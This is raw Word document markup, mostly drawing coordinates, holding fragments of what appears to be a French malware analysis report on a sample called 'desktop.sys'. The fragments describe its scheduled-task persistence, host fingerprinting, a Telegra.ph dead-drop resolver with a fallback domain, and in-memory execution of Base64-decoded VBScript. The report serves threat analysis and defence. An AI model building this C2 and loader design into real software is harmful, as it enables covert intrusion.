                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1782444"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2661919"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2661919"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1782444"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1160779"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1160779"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1783079"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1783079"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="116077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160779"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="116077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574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1540519</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5394959" cy="216538"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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94959" cy="216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94959" h="216535">
                          <a:moveTo>
                            <a:pt x="0" y="216535"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2491740" y="216535"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3148965" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3148965" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5394325" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5394325" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3148330" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="539495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6768" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3391535</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1756419</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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8816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1756419</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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0864" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2524125</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2249179</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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2912" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1343025</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2249179</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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0" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6575425</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2249179</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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7008" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5475605</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2249179</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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1104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4869189</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1017273" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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27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727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1017270" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="101727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0" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5437505</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4869189</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="280673" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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67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066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280669" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="28066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9296" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1094104</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5257809</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="772163" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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216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216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772160" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="77216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032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134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2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1235733</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1223191" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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31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Note de l’analyste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3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1524900</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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33"/>
                          </w:rPr>
                          <w:t xml:space="preserve">desktop.sys</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle58"/>
                            <w:spacing w:val="44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8"/>
                            <w:spacing w:val="-1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">:</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle58"/>
                            <w:spacing w:val="16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8"/>
                            <w:spacing w:val="22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8"/>
                            <w:spacing w:val="-1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Nouvelle</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle58"/>
                            <w:spacing w:val="16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8"/>
                            <w:spacing w:val="22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8"/>
                            <w:spacing w:val="-1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">tâche</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle58"/>
                            <w:spacing w:val="3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DiskDiagnosticDataCollector</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle58"/>
                            <w:spacing w:val="45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8"/>
                            <w:spacing w:val="-1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">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441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1741393</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2486608" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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660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MicrosoftUpdateTaskMachineCore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2042818</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Lors de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son initialisation,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il récupère deux informations propres à la ma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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">chine : le nom d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6464" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1362074</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2234788</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5374523" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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45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%COMPUTERNAME%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) et le numéro de série du lecteur système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%SystemDrive%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2236493</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="478151" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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1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l'hôte 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8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2431438</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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converti ensuite en hexadécimal. Ces deux valeurs sont ensuite intégrées dans des en-têtes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9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2604793</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3970627" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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7062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HTTP personnalisés lors de chaque communication avec le C2.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0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2879748</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5834898" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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 script implémente le même mécanisme de </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle17"/>
                            <w:spacing w:val="2"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Dead Drop Resolver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(DDR), mais avec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1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3050170</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5796286" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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28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comportement différent. Si une URL précédemment résolue est présente dans </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="-9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">%APPDATA%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2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3229875</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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\VirtualStore\desktopc.ini,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celle-ci est réutilisée directement. Dans le cas contraire,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3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3412513</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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malware interroge l'URL stockée dans ses fichiers de configuration et sinon une page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4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3582935</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Telegra.ph codée en dur (</w:t>
                        </w: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O5Wv6FIfzx-07-22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) puis extrait, via une expression régulière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3765573</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2046399" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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63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nouvelle adresse du serveur C2.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6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4040528</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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communication avec le serveur repose sur une requête HTTP POST ne contenant aucun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7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4213883</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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corps de message. L'identification de la victime est exclusivement réalisée à l'aide d'en-têtes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8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4387238</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339237" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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23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HTTP personnalisés.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9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4662193</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Lorsque le serv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eur répond avec un code HTTP 200, la réponse est co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nver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tie en texte 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080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4854163</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1117980" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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98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ADODB.Stream,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1824" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2000885</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4854163</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4735713" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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571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nettoyée des caractères de contrôle et du marqueur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)))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, puis décodée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2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5050813</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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4"/>
                          </w:rPr>
                          <w:t xml:space="preserve">dep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uis Base64.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Le VBScript obtenu est finalement exécuté directement en mémoire à l'aide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3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5244488</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="229880" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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8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4896" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1113154</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5242783</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="829828" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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982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Execute()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5717563</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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En cas d'échec, le script tente de récupérer une nouvelle configuration via Telegra.ph ou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6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5887985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5795642" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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564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3"/>
                          </w:rPr>
                          <w:t xml:space="preserve">utilise le domaine codé en dur</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="15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domanuc.ru</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="20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comme solution de secours.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7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6070623</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2931119" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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111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déroulement peut être résumé comme suit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89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001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10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206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308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67718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8599169"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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8599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8599169">
                          <a:moveTo>
                            <a:pt x="0" y="8325485"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="8325485"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="8599169"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="8599169"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="8325485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8326120"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="8326120"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="8325485"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="8325485"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="8599169"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="8599169"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="8325485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8326120"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="832612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8208" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1555749</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>990597</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4450080" cy="8178177"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="214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 preferRelativeResize="0">
                      <a:picLocks noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-14" r="0" t="-7" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4450080" cy="8178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50080" h="8178177">
                          <a:moveTo>
                            <a:pt x="0" y="8178177"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4450080" y="8178177"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4450080" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="817817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923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025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1280" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2007235</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9153051</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3585121" cy="133833"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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5121" cy="13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Figure 14 –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Schéma fonctionnel de l’échantillon </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle59"/>
                            <w:spacing w:val="26"/>
                          </w:rPr>
                          <w:t xml:space="preserve">desktop.sys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analysé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23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332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435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537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69356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5060950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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5060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5060950">
                          <a:moveTo>
                            <a:pt x="0" y="4785359"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4785359"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="5060950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5060950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4785359"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3428365"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3428365"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4785359"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4785359"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3428365"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3267709"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3267709"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3429000"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3429000"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3267709"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1750694"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1750694"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2767330"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2767330"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1750694"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1129029"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1129029"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1751329"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1751329"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1129029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1129029"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="112902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459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8104514</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5875019" cy="502920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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502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502920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502920"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="50292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176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5060950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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5060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5060950">
                          <a:moveTo>
                            <a:pt x="0" y="4785359"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4785359"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="5060950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5060950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4785359"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3428365"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3428365"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4785359"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4785359"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3428365"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3267709"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3267709"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3429000"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3429000"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3267709"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1750694"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1750694"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2767330"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2767330"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1750694"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1129029"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1129029"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1751329"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1751329"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1129029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1129029"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="112902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2784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8104514</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5875019" cy="502920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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502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502920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502920"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="50292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6096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8105149</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5874384" cy="502285"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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502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502285">
                          <a:moveTo>
                            <a:pt x="3174" y="50228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502285"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="502285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="499110"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="499110"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="499110"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="499110"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="50228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0192" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>946784</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3205489</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1017273" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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27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727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1017270" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="101727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2240" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3342005</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4883159</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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4288" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1505585</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4883159</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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6336" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5551804</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4883159</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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8384" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3551555</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4883159</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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0432" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4062095</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6649729</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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2480" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2963545</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6649729</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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4528" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6621144</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6649729</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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6576" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4867274</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6649729</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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862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9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2224003" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
